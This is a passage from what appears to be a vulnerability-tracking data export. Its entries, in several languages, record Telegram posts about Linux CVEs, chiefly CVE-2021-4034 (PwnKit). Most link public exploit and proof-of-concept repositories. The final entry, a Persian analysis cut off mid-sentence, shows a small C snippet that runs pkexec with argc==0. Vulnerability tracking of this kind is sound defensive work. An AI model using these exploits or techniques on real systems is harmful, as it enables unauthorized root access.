\u0438\u0437 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 GRIMM \u0410\u0434\u0430\u043c \u041d\u0438\u043a\u043e\u043b\u0441 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u043b \u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-27365 (\u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0431\u0443\u0444\u0435\u0440\u0430 \u043a\u0443\u0447\u0438, \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439) \u0432 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435 iSCSI \u044f\u0434\u0440\u0430 Linux. \u0411\u0430\u0433 \u0432 \u043a\u043e\u0434\u0435 \u0431\u044b\u043b \u0441 2006 \u0433\u043e\u0434\u0430. \u0417\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u043c\u0438 \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u0432\u0441\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b Linux.\n\n#Linux #\u041f\u041e #\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441 #\u0425\u0430\u043a\u0435\u0440\u044b\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-09-11T09:19:15.000000Z"}, {"uuid": "8772d314-940b-4717-b09b-58ac689ac766", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1402", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPseudopatch for CVE-2021-4034\nURL\uff1ahttps://github.com/m96dg/CVE-2021-41773-exercise", "creation_timestamp": "2022-01-26T11:26:48.000000Z"}, {"uuid": "4f4c6b13-56da-483d-a648-71fe5bada62b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "Telegram/eadLOWEYBTZCQCtvYpa_57UJUPS5kPEDk1F_xEN9dagEQEQ", "content": "", "creation_timestamp": "2026-04-01T09:00:05.000000Z"}, {"uuid": "5d6e23f7-5839-4882-a820-769e2c44086b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "Telegram/kbwvMEYxNMTUq0MoPBZhBxwW65HhDCC2hCGDcY8gOyB2buw", "content": "", "creation_timestamp": "2025-09-11T21:00:04.000000Z"}, {"uuid": "d8fee561-3f02-420d-b9c3-6e1f851cad7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1399", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA stupid poc for CVE-2021-4034\nURL\uff1ahttps://github.com/LukeGix/CVE-2021-4034", "creation_timestamp": "2022-01-26T10:39:05.000000Z"}, {"uuid": "7ba76ec0-12a4-4eda-b402-d523ff23e827", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1407", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-4034 Proof Of Concept\nURL\uff1ahttps://github.com/luijait/Pwnkit-PoC", "creation_timestamp": "2022-01-26T17:42:25.000000Z"}, {"uuid": "8ea88412-e103-4ebe-9654-96a56ddabc38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1405", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-4034 in Bash Script\nURL\uff1ahttps://github.com/azminawwar/CVE-2021-4034", "creation_timestamp": "2022-01-26T15:58:39.000000Z"}, {"uuid": "6121bbfe-aa1b-45fb-aa76-e579f1fb8527", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1404", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSelf-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation\nURL\uff1ahttps://github.com/ly4k/PwnKit", "creation_timestamp": "2022-01-26T14:32:31.000000Z"}, {"uuid": "dea8bef5-e8a9-480d-853a-cb3f97afef02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1403", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPoC for the CVE-2021-4034 vulnerability, affecting polkit < 0.120.\nURL\uff1ahttps://github.com/c3l3si4n/pwnkit", "creation_timestamp": "2022-01-26T13:36:14.000000Z"}, {"uuid": "55d8024b-c9d2-4b39-9e55-406a54478b2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1412", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-4034\nURL\uff1ahttps://github.com/luijait/PwnKit-Exploit", "creation_timestamp": "2022-01-26T22:18:31.000000Z"}, {"uuid": "e69b3e3e-5916-4e36-bac3-19a7e41af96e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1424", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-4034, exploit para escalado de privilegios en SO Linux a root\nURL\uff1ahttps://github.com/hackingyseguridad/CVE-2021-4034", "creation_timestamp": "2022-01-27T14:21:30.000000Z"}, {"uuid": "1576c8f3-5228-4ede-b22f-43912b77f37a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1435", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-4034 - One line in the terminal for an instant priv esc to boxes that are vulnerable. See usage.\nURL\uff1ahttps://github.com/n3onhacks/CVE-2021-4034-BASH-One-File-Exploit", "creation_timestamp": "2022-01-28T05:06:11.000000Z"}, {"uuid": "b22153a6-4746-4aa4-b2e5-0143986d8ba1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1434", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploit for the PwnKit vulnerability, CVE-2021-4034\nURL\uff1ahttps://github.com/jpmcb/pwnkit-go", "creation_timestamp": "2022-01-28T04:28:03.000000Z"}, {"uuid": "06b5dc04-fc86-4a09-8cb7-b1b755f46f72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1433", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-4034 POC exploit\nURL\uff1ahttps://github.com/PeterGottesman/pwnkit-exploit", "creation_timestamp": "2022-01-28T00:42:02.000000Z"}, {"uuid": "810849cf-91e0-4798-b875-7b4fb91293b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1430", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aAn exploit for CVE-2021-4034 aka Pwnkit: Local Privilege Escalation in polkit's pkexec\nURL\uff1ahttps://github.com/whokilleddb/CVE-2021-4034", "creation_timestamp": "2022-01-27T20:02:41.000000Z"}, {"uuid": "f9b44ccb-eff8-49f3-8c2c-201be8ec5e01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1440", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1apkexec (Polkit) exploit of Privilege Escalation vulnerability CVE-2021-4034\nURL\uff1ahttps://github.com/Kirill89/CVE-2021-4034", "creation_timestamp": "2022-01-28T15:19:08.000000Z"}, {"uuid": "9de9edb7-3e00-462f-829b-d333c4616104", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1439", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-4034\nURL\uff1ahttps://github.com/Sakura-nee/CVE-2021-4034", "creation_timestamp": "2022-01-28T13:43:42.000000Z"}, {"uuid": "179c957a-5b64-4798-ae8f-aa9a043d7b5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1438", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPoC for PwnKit: Local Privilege Escalation Vulnerability in polkit\u2019s pkexec (CVE-2021-4034)\nURL\uff1ahttps://github.com/Pr0f3ssor/CVE-2021-4034", "creation_timestamp": "2022-01-28T13:08:49.000000Z"}, {"uuid": "814ea365-ff67-4c0e-b082-083c578b64e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/tech_b0lt_Genona/2991", "content": "PoC CVE-2021-4034\nhttps://github.com/berdav/CVE-2021-4034", "creation_timestamp": "2022-01-26T11:03:35.000000Z"}, {"uuid": "8f66c437-25a7-4842-84dc-f85a553461dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/tech_b0lt_Genona/2990", "content": "Researchers from Qualys today published an advisory about a local privilege escalation vulnerability in the pkexec tool, that is installed as part of the Polkit (formerly PolicyKit) package.\n. . .\nNow, there are three scary things about this vulnerability:\n\n- It has been around for 12+ years (!!!) since it was introduced in a commit to pkexec in May 2009\n\n- The affected version of pkexec is installed with all popular Linux distributions: Ubuntu, Debian, Fedora and CentOS\n\n- It is very simple to create the exploit, and it works 100% reliable\n\n\nLocal privilege escalation vulnerability in polkit's pkexec (CVE-2021-4034)\nhttps://isc.sans.edu/diary/rss/28272\n\n\u041a\u043e\u043c\u043c\u0438\u0442 \u0441 \u043f\u0430\u0442\u0447\u0435\u043c\nhttps://gitlab.freedesktop.org/polkit/polkit/-/commit/a2bf5c9c83b6ae46cbd5c779d3055bff81ded683", "creation_timestamp": "2022-01-26T06:00:41.000000Z"}, {"uuid": "2f4aab55-4660-497c-bf2e-4d0be821102b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "exploited", "source": "https://t.me/YAH_Channel/498", "content": "\u041f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u0441\u043f\u043b\u043e\u0438\u0442 \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 LPE \u0432 Linux \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 \u0447\u0435\u0440\u0435\u0437 polkit.\n\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt\n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442: https://github.com/berdav/CVE-2021-4034/blob/main/cve-2021-4034.c\n\n\u0412\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e.", "creation_timestamp": "2022-01-26T08:11:34.000000Z"}, {"uuid": "8406035a-91b9-4a7d-905b-616d1f6b2e63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/codeby_sec/6165", "content": "\ud83d\udc27 CISA \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u0445, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c PwnKit \u0432 Linux\n\n\u0410\u0433\u0435\u043d\u0442\u0441\u0442\u0432\u043e \u043f\u043e \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u0437\u0430\u0449\u0438\u0442\u0435 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b (CISA) \u0432\u043d\u0435\u0441\u043b\u043e \u0432 \u0441\u043f\u0438\u0441\u043e\u043a \u043e\u0448\u0438\u0431\u043e\u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u044b\u0441\u043e\u043a\u043e\u0433\u043e \u0443\u0440\u043e\u0432\u043d\u044f \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432 Linux, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0443\u044e \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c PwnKit. \u041e\u0448\u0438\u0431\u043a\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0430\u044f \u043d\u043e\u043c\u0435\u0440 CVE-2021-4034, \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 pkexec, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u043c \u0432\u043e \u0432\u0441\u0435\u0445 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445.\n\nPwnKit \u2014 \u044d\u0442\u043e \u043e\u0448\u0438\u0431\u043a\u0430 \u043f\u043e\u0432\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u043f\u0430\u043c\u044f\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u043e\u043b\u043d\u044b\u0445 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 root \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 Linux \u0441 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0435\u0439 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e. \u041a\u043e\u0434 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 \u0434\u043b\u044f \u0434\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430 \u043a\u043e\u043d\u0446\u0435\u043f\u0446\u0438\u0438 (PoC) \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u0432 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0435 \u043c\u0435\u043d\u0435\u0435 \u0447\u0435\u043c \u0447\u0435\u0440\u0435\u0437 \u0442\u0440\u0438 \u0447\u0430\u0441\u0430 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Qualys \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0434\u0435\u0442\u0430\u043b\u0438 \u0434\u043b\u044f PwnKit.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Qualys \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438, \u0447\u0442\u043e \u0435\u0435 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u0435 \u0432\u043e\u0441\u0445\u043e\u0434\u0438\u0442 \u043a \u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 pkexec, \u0447\u0442\u043e \u043e\u0437\u043d\u0430\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u043e\u043d\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 Polkit. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0441 \u043c\u043e\u043c\u0435\u043d\u0442\u0430 \u043f\u0435\u0440\u0432\u043e\u0433\u043e \u0432\u044b\u043f\u0443\u0441\u043a\u0430 pkexec \u0432 \u043c\u0430\u0435 2009 \u0433\u043e\u0434\u0430 \u044d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0430\u0441\u044c \u043d\u0435\u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043d\u043e\u0439 \u0431\u043e\u043b\u0435\u0435 12 \u043b\u0435\u0442.\n\n\ud83d\uddde \u0411\u043b\u043e\u0433 \u041a\u043e\u0434\u0435\u0431\u0430\u0439\n\n#linux #malware", "creation_timestamp": "2022-06-30T05:37:30.000000Z"}, {"uuid": "936058b4-fd6b-4ad3-9cb5-96de66c9ebf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/linuxtnt/3778", "content": "\u0645\u0642\u062f\u0627\u0631 \u0635\u0641\u0631 \u0628\u0631\u0627\u06cc argc \u062f\u0631 \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u0644\u06cc\u0646\u0648\u06a9\u0633\u06cc. \u0686\u0631\u0627 \u0648 \u0686\u06af\u0648\u0646\u0647\u061f\n\n\u0647\u0645\u0647 \u0686\u06cc\u0632 \u0627\u0632 \u0628\u0631\u0631\u0633\u06cc CVE-2021-4034 \u0648 \u06a9\u0627\u0645\u067e\u0627\u06cc\u0644 \u0645\u062c\u062f\u062f PolKit \u0628\u0631 \u0631\u0648\u06cc Ubuntu 22.04 \u0634\u0631\u0648\u0639 \u0634\u062f! \u062a\u0635\u0645\u06cc\u0645 \u062f\u0627\u0634\u062a\u0645 \u06cc\u06a9 \u0646\u0633\u062e\u0647\u200c\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 PolKit \u0631\u0648 \u0628\u0627 \u0641\u0639\u0627\u0644 \u06a9\u0631\u062f\u0646 Debug Symbols \u06a9\u0627\u0645\u067e\u0627\u06cc\u0644 \u06a9\u0631\u062f\u0647 \u0648 \u0645\u0631\u0627\u062d\u0644 \u06a9\u0627\u0645\u0644 \u0627\u06cc\u0646 CVE \u0631\u0648 \u062f\u0631 GDB \u0628\u0631\u0631\u0633\u06cc \u06a9\u0646\u0645. \u0628\u0647 \u0635\u0648\u0631\u062a \u062e\u0644\u0627\u0635\u0647 \u0628\u06af\u0645 \u06a9\u0647 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u062f\u0631 \u0628\u0627\u06cc\u0646\u0631\u06cc pkexec \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f \u0648 \u0628\u0647 \u06a9\u0645\u06a9 \u0622\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 LPE \u0627\u0646\u062c\u0627\u0645 \u062f\u0627\u062f. \u06cc\u06a9\u06cc \u0627\u0632 \u0634\u0631\u0627\u06cc\u0637 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0627\u06cc\u0646 \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u0632\u0645\u0627\u0646 \u0627\u062c\u0631\u0627\u06cc pkexec \u0634\u0631\u0637 argc==0 \u0628\u0631\u0642\u0631\u0627\u0631 \u0628\u0627\u0634\u062f \u06a9\u0647 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0622\u0646 \u0645\u062a\u063a\u06cc\u0631\u0647\u0627\u06cc \u0645\u062d\u0644\u06cc \u062e\u0648\u0627\u0646\u062f\u0647 \u0634\u062f\u0647 \u0648 \u0628\u062a\u0648\u0627\u0646 \u06cc\u06a9 library \u0645\u062e\u0631\u0628 \u0631\u0627 \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u0646\u0645\u0648\u062f.\n\n\u0627\u0632 \u0622\u0646\u062c\u0627\u06cc\u06cc \u06a9\u0647 pkexec \u0639\u0644\u0627\u0648\u0647 \u0628\u0631 \u0644\u06cc\u0646\u0648\u06a9\u0633 \u0628\u0631 \u0631\u0648\u06cc Solaris, BSD \u0647\u0645 \u0642\u0627\u0628\u0644 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0633\u062a\u060c \u062f\u0631 \u0645\u0642\u0627\u0644\u0647\u200c\u06cc \u0627\u0635\u0644\u06cc \u0627\u06cc\u0646 CVE \u06a9\u0647 \u062a\u0648\u0633\u0637 Qualys Security \u0645\u0646\u062a\u0634\u0631 \u0634\u062f\u0647 \u0627\u0633\u062a \u0645\u062a\u0646 \u0632\u06cc\u0631 \u0645\u0634\u0627\u0647\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0627\u0632 \u0627\u0644\u0632\u0627\u0645 argc==0 \u0628\u0631\u0627\u06cc \u0627\u0645\u06a9\u0627\u0646\u200c\u067e\u0630\u06cc\u0631 \u0628\u0648\u062f\u0646 \u0627\u06cc\u0646 LPE \u062e\u0628\u0631 \u0645\u06cc\u200c\u062f\u0647\u062f.\nOpenBSD is not exploitable, because its kernel refuses to execve() a program if argc is 0\n\n\u067e\u0633 \u0641\u0631\u0636 \u0645\u0646 \u0627\u06cc\u0646 \u0628\u0648\u062f \u06a9\u0647 \u062f\u0631 \u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc \u0627\u062e\u06cc\u0631 \u0644\u06cc\u0646\u0648\u06a9\u0633 \u0647\u0645 \u0628\u0627 \u06a9\u0627\u0645\u067e\u0627\u06cc\u0644 PolKit \u0628\u0627\u06cc\u062f \u0628\u062a\u0648\u0627\u0646 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0631\u0627 \u062a\u0633\u062a \u06a9\u0631\u062f. \u0627\u06cc\u0646 \u0628\u0648\u062f \u06a9\u0647 \u0628\u0631 \u0631\u0648\u06cc Ubuntu 22.04 \u06cc\u06a9 \u0646\u0633\u062e\u0647\u200c\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0631\u0627 \u06a9\u0627\u0645\u067e\u0627\u06cc\u0644 \u06a9\u0631\u062f\u0647 \u0648 \u06cc\u06a9 \u06a9\u062f \u0633\u0627\u062f\u0647 \u0628\u0647 \u0635\u0648\u0631\u062a \u0632\u06cc\u0631 \u0646\u0648\u0634\u062a\u0645 \u06a9\u0647 pkexec \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0631\u062f\u0647 \u0648 argc==0 \u0628\u0631\u0642\u0631\u0627\u0631 \u0628\u0627\u0634\u062f.\n\nvoid main() {\n char *args[] = { NULL };\n char *envs[] = {\"SHELL=/bin/bash\", 0};\n execve(\"pkexec\", args, envs);\n}\n\n\u0628\u0627 \u0627\u062c\u0631\u0627\u06cc \u0628\u0631\u0646\u0627\u0645\u0647 \u0648 \u0632\u062f\u0646 strace \u0645\u0634\u0627\u0647\u062f\u0647 \u0634\u062f \u06a9\u0647 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u062f\u0631 \u0633\u0637\u062d user \u0637\u0628\u0642 \u0627\u0646\u062a\u0638\u0627\u0631 \u0627\u0646\u062c\u0627\u0645 \u0634\u062f.\nexecve(\"pkexec\", [], 0x7ffe3883b200 /* 1 var */)\n\n\u0648\u0644\u06cc \u062f\u0648 \u062a\u0627 \u0645\u0648\u0631\u062f \u0639\u062c\u06cc\u0628 \u0631\u062e \u062f\u0627\u062f. \u0627\u0648\u0644 \u0627\u06cc\u0646\u06a9\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u062f\u0631 gdb \u0628\u0631 \u062e\u0644\u0627\u0641 \u0627\u0646\u062a\u0638\u0627\u0631 \u0628\u0627 argc==1\u200c \u0627\u062c\u0631\u0627 \u0634\u062f\u0647 \u0648 argv[0] 